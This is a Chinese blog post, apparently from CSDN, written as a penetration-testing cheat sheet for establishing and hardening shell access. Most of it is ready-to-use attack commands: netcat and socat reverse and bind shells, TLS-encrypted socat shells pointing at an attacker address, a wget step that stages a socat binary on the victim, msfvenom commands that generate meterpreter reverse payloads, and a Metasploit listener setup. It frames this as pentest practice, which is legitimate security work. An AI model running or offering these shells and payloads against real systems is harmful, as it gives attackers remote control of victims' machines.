渗透测试之建立shell连接及连接加固

最新推荐文章于 2024-09-28 22:34:31 发布
最新推荐文章于 2024-09-28 22:34:31 发布
阅读量314 收藏 1
点赞数 9
分类专栏: 网络安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44268185/article/details/141357403
版权

渗透测试之建立shell连接及连接加固

shell获取

netcat

反向shell

攻击机执行
sudo nc -lvnp 443
被害机执行
nc <IP> <PORT> -e /bin/bash

绑定shell

攻击机执行
nc MACHINE_IP <PORT>
被害机执行
nc -lvnp <PORT>  -e "cmd.exe"

稳定shell

python
#备注
1、此方法特别适合linux
2、如果shell死机请键入 `reset`并按 Enter 键,恢复中断输出
#执行
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
ctrl + Z
stty raw -echo; fg
rlwrap
# 备注

此方法对于windows特别有用
#安装
sudo apt install rlwrap
#Windows执行
rlwrap nc -lvnp <PORT>
#Linux执行
rlwrap nc -lvnp <PORT>
Ctrl + Z
stty raw -echo; fg
socat
#备注
此方法对于linux有效,对于windows效果甚微
#二进制下载
https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat?raw=true

# 下载到受害机
sudo python3 -m http.server 80
wget <LOCAL-IP>/socat -O /tmp/socat

# 运行详见socat标题

socat

建立反向shell

攻击机运行
socat TCP-L:<port> -
受害机运行
#windows
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes
#linux
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li"

建立正向shell

受害机运行
# Linux
socat TCP-L:<PORT> EXEC:"bash -li"
# Windows
socat TCP-L:<PORT> EXEC:powershell.exe,pipes
攻击机运行
socat TCP:<TARGET-IP>:<TARGET-PORT> -

建立更稳定的反向shell

攻击机运行
socat TCP-L:<port> FILE:`tty`,raw,echo=0
受害机运行
socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane
备注
1、此过程将建立完全交互终端
2、socat shell 无法正常工作添加 `-d -d`命令来增加详细程度是非常值得的

socat 加密shell

创建证书

openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
cat shell.key shell.crt > shell.pem

建立反向shell

# 攻击机运行
socat OPENSSL-LISTEN:<port>,cert=shell.pem,verify=0 -

# 受害机运行
socat OPENSSL:<LOCAL-IP>:<LOCAL-PORT>,verify=0 EXEC:/bin/bash

建立正向shell

# 受害机运行
socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes

# 攻击机运行
socat OPENSSL:<TARGET-IP>:<TARGET-PORT>,verify=0 -

建立交互式加密反向shell

#攻击机运行
socat OPENSSL-LISTEN:53,cert=encrypt.pem,verify=0 FILE:`tty`,raw,echo=0
#受害机运行
socat OPENSSL:10.10.10.5:53 EXEC:"bash -li",pty,stderr,sigint,setsid,sane

修改shell终端大小

查看shell终端大小

stty -a

设置终端大小

stty rows <number>
stty cols <number>

常见反弹shell负载

# Payloads all the Things
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

# Reverse Shell Cheatsheet
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

# kali 自带webshell
/usr/share/webshells

# Seclists repo
https://github.com/danielmiessler/SecLists

Msfvenom

生成反向分阶段msf shell

#winddows 64位
msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>

#linux 64位
msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o shell LHOST=<listen-IP> LPORT=<listen-port>

#winddows 32位
msfvenom -p windows/meterpreter/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>

#linux 32位
msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf -o shell LHOST=<listen-IP> LPORT=<listen-port>

# 生成无阶段则将shell/reverse_tcp 替换为 shell_reverse_tcp

# 生成单纯的shell则将meterpreter 替换为 shell

查看可用的payload

msfvenom --list payloads

metasploit 创建监听

启动 msf

msfconsole

启动监听

use exploit/multi/handler
set PAYLOAD <payload>
set LHOST <listen-address>
set LPORT <listen-port>
exploit -j

# payload 必须和负载生成时一致

查看会话

sessions

进入会话

sessions <number>
K-D小昊
关注
专栏目录
安全术语扫盲
_南寻_的博客
02-09 1万+
行业术语扫盲 肉鸡 所谓“肉鸡”是一种很形象的比喻,比喻那些可以随意被我们控制的电脑,对方可以是WINDOWS系统,也可以是UNIX/LINUX系统,可以是普通的个人电脑,也可以是大型的服务器,我们可以像操作自己的电脑那样来操作它们,而不被对方发觉。 木马 木马就是表面上伪装成了正常的程序,但是当这些程序运行时,就会获取系统的整个控制权限。有很多黑客就是热衷于使用木马程序来控制别人的电脑,比如灰鸽子,黑洞,PcShare等等 远控 远程控制,是在网络上由一台电脑(主控端Remote/客户端)远距
cmd 返回值_渗透不会反弹shell?来教你一个cmd的shell
weixin_39756235的博客
11-20 142
原创 lengyi 合天智汇包含的库:#include <winsock2.h> #include <windows.h> #include <ws2tcpip.h> #include <iostream> #include <string> #pragma comment(lib, "Ws2_32.lib") #define DEFA...
内网渗透-反弹shell的N种姿势
lza20001103的博客
04-15 1443
内网渗透-反弹shell的N种姿势
渗透不会反弹shell?来教你一个cmd的shell
蚁景网安学院
02-20 360
渗透不会反弹shell?来教你一个cmd的shell包含的库:#include <winsock2.h> #include <windows.h> #inclu...
web渗透【11】phpmyadminshell的三种方法
司徒荆的博客
05-30 6038
查看phpMyAdmin能否自定义导出文件目录的权限
SQLMAP渗透笔记之交互shell及命令执行(即os参数的使用)
Birdman-one的博客
12-26 1万+
---------------------------------------------------------------------------------------------                        SQLMAP渗透笔记之交互shell及命令执行(即os参数的使用) ----------------------------------
渗透测试面试题汇总(全)
热门推荐
渗透、攻防、CTF、编程
08-31 3万+
思路流程 信息收集 漏洞挖掘 漏洞利用&权限提升 清除测试数据&输出报告 复测 问题 深信服一面: SQL注入防护 为什么参数化查询可以防止sql注入 SQL头注入点 盲注是什么?怎么盲注? 宽字节注入产生原理以及根本原因 产生原理 在哪里编码 根本原因 解决办法 sql里面只有update怎么利用 sql如何shell/单引号被过滤怎么办 代替空格的方法 mysql的网站注入,5.0以上和5.0以下有什么区别? XS
渗透测试工程师面试题(最全总结)
qq_59468567的博客
03-13 1407
日志、测试数据的清理总结,输出渗透测试报告,附修复方案复测验证并发现是否有新漏洞,输出报告,归档1.拿到一个待检测的站,你觉得应该先做什么? a、信息收集开始检测漏洞,如 XSS,XSRF,sql 注入,代码执行,命令执行,越权访问,目录读取,任意文件读取,下载,文件包含,远程命令执行,弱口令,上传,编辑器漏洞,暴力破解等 c、漏洞利用利用以上的方式拿到 webshell,或者其他权限 d、权限提升提权服务器,比如 windows 下 mysql 的 udf 提权,serv-u 提权,windows 低版本
渗透测试安全手册(干货)
保持微笑的博客
10-31 4404
渗透测试安全手册
网络安全售前入门05安全服务——渗透测试服务方案
打工人
08-28 1574
渗透性测试是对安全情况最客观、最直接的评估方式,主要是模拟黑客的攻击方法对系统和网络进行非破坏性质的攻击性测试,目的是侵入系统,获取系统控制权并将入侵的过程和细节产生报告给用户,由此证实用户系统所存在的安全威胁和风险,并能及时提醒安全管理员完善安全策略。渗透性测试是工具扫描和人工评估的重要补充。工具扫描具有很好的效率和速度,但是存在一定的误报率,不能发现高层次、复杂的安全问题;
渗透测试入门—— 常见术语概述
weixin_46694260的博客
12-26 9080
00x1 前言 刚入门小白,收集了一些渗透术语,废话不多说。 00x2 渗透术语 1.脚本 动态网站(如:asp,php,jsp), linux, python 2.网站 2.1静态网站:与后台交互比较少,如html) 2.2动态网站:使用动态脚本编 如:asp,php,jsp,交互方便但是安全性不高,如果代码过滤不严格可能会导致漏洞最终导致后台linux被别人随意操作 3.http协议 http(HyperText Transfer Protocol),超文本传输协议。是因特网上应用最为广泛的一种网络传
Metasploit渗透测试之制作隐藏后门系列文章
Metasploit是一个广泛使用的开源渗透测试框架,是渗透测试工作者和黑客们经常使用的工具之一。它包含了一系列的漏洞扫描工具、攻击工具和payload生成器,能够帮助安全专家评估目标系统的安全性,发现潜在的漏洞,并...
Metasploit渗透测试之制作隐藏后门:利用远程文件包含攻击
它包含了一系列的渗透测试工具和模块,为安全研究人员和渗透测试人员提供了丰富的功能和灵活性。 Metasploit框架提供了针对网络安全漏洞的验证、漏洞利用和后渗透测试的能力。这些功能包括扫描、模块化编程、恶意...
Metasploit渗透测试之制作隐藏后门:使用Meterpreter实现特权提升
它拥有强大的渗透测试功能和丰富的模块库,可以帮助安全专家快速发现系统和网络中的安全漏洞,并进行渗透测试。 Metasploit包含了上千种不同类型的漏洞利用模块,以及用于渗透测试各个阶段的功能模块,比如信息收集...
探索光耦:隔离电压——光耦保障电路安全与性能的关键
forvevr的博客
09-25 703
在实际应用中,光耦的隔离电压应根据工作环境中的电压等级、电流负载和潜在的电压波动来选择。比如,对于高压电力设备,建议选择隔离电压较高的光耦,以应对突发的电压尖峰或电流浪涌。在现代电子设备和系统中,电气隔离是保障电路稳定运行和安全的重要环节,而光耦(光电耦合器)则是实现这种隔离的核心元件之一。具有较高隔离电压的光耦能在这些波动和干扰中,稳定地工作,确保系统运行的连续性和可靠性。光耦通过将不同电位的电路有效隔离,避免了跨电路间的电流回流对低压电路元件的损害,延长了设备的使用寿命。
【蚂蚁HR-注册/登录安全分析报告】
最新发布
09-28 615
蚂蚁社保是武汉微蚁企业服务有限公司旗下的网站,主要提供五险一金的代缴、补缴、社保开户、社保挂靠和社保代理服务。该平台主要覆盖一二线城市,目前已覆盖13+城市。蚂蚁社保的特点是高度自动化和在线化,创始人团队致力于通过程序和硬件替代所有可以自动化的环节,从而最大限度地减少人为错误,作为头部的社保代缴平台, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
【车联网安全】车端网络攻击及检测的框架/模型
#7的博客
09-24 1407
本文主要调研了车联网安全的一些攻击及检测的模型/框架,对国家标准进行了调研,并汇总上述调研内容。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值